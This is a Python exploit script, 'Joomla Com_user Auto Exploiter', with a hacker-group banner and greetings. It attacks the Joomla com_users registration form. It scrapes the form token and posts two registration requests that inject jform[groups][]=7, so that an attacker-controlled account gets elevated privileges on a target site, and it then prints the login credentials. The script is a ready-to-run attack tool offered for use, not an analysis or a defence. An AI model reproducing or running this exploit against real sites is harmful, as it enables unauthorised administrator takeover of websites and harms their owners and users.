Joomla Com_user Auto Exploiter

1.    
2.  
3.     #!/usr/bin/python
4.     # Joomla Com_User Auto Exploit =D
5.     # By xSecurity
6.      
7.     import requests as sec4ever, re, urllib, sys, os
8.     from threading import Thread
9.     from time import sleep
10.     def cls():
11.             os.system(['clear','cls'][os.name =='nt'])
12.      
13.     cls()
14.     print '''
15.          __                      _ _        
16.    __  __/ _\ ___  ___ _   _ _ __(_) |_ _   _
17.    \ \/ /\ \ / _ \/ __| | | | '__| | __| | | |
18.    >  < _\ \ __/ (__| |_| | |  | | |_| |_| |
19.    /_/\_\\__/\___|\___|\__,_ |_|  |_|\__|\__, |
20.                                        |___/Joomla [Com_User] Auto Exploit =D
21.    #Home: Sec4ever.CoM | Is-Sec.CoM | s3c-k.com
22.    #Greets: UzunDz - b0x - Lov3rDNS - Mr.Dm4r - DamaneDz - rOx - r0kin
23.    Special For My Lov3r Cyber-Crystal
24.    #Note: U Need Install Requests Package: http://www.youtube.com/ watch?v=Ng5T18HyA-Q'''
25.      
26.     pwd2 = 'fio3jfiej9cewc9c9w0eufew9u'
27.     def one(target,pwd1,pwd2,email):
28.             # Wrong Password
29.             x1 = xsec.get(target+'/index.php?option=com_users&view=registration')
30.             token = re.findall('type="hidden" name="(.*?)" value="1"', x1.text)
31.             post = {}
32.             post["jform[name]"] = 'xSecurity'
33.             post["jform[username]"] = user
34.             post["jform[password1]"] = pwd1
35.             post["jform[password2]"] = pwd2
36.             post["jform[email1]"] = email
37.             post["jform[email2]"] = email
38.             post["jform[groups][]"] = "7"
39.             post["option"] = "com_users"
40.             post["task"] = "registration.register"
41.             post[token[0]] = "1"
42.             p1 = xsec.post(target+'/index.php?option=com_users&view=registration', data=urllib.urlencode(post))
43.             x2 = xsec.get(target+'/index.php/component/users/?view=registration&layout=complete')
44.      
45.     def exploit(target,pwd1,pwd2,email):
46.             # Wrong Password
47.             x3 = xsec.get(target+'/index.php?option=com_users&view=registration')
48.             token = re.findall('type="hidden" name="(.*?)" value="1"', x3.text)
49.             post = {}
50.             post["jform[name]"] = 'xSecurity'
51.             post["jform[username]"] = user
52.             post["jform[password1]"] = pwd1
53.             post["jform[password2]"] = pwd1
54.             post["jform[email1]"] = email
55.             post["jform[email2]"] = email
56.             post["jform[groups][]"] = "7"
57.             post["option"] = "com_users"
58.             post["task"] = "registration.register"
59.             post[token[0]] = "1"
60.             p2 = xsec.post(target+'/index.php?option=com_users&view=registration', data=urllib.urlencode(post))
61.             x4 = xsec.get(target+'/index.php/component/users/?view=registration&layout=complete')
62.      
63.     xsec = sec4ever.session()
64.     if len(sys.argv) == 5:
65.             target = sys.argv[1]
66.             user = sys.argv[2]
67.             pwd1 = sys.argv[3]
68.             email = sys.argv[4]
69.             one(target,pwd1,pwd2,email)
70.             ex = exploit(target,pwd1,pwd2,email)
71.             print '[*] Go To Your Email & Active Then Login =D\nUsername: '+user+' & Password: '+pwd1
72.     else:
73.             print "Usage: python tool.py http://target.com/j0s/ youruser yourpass yourmail"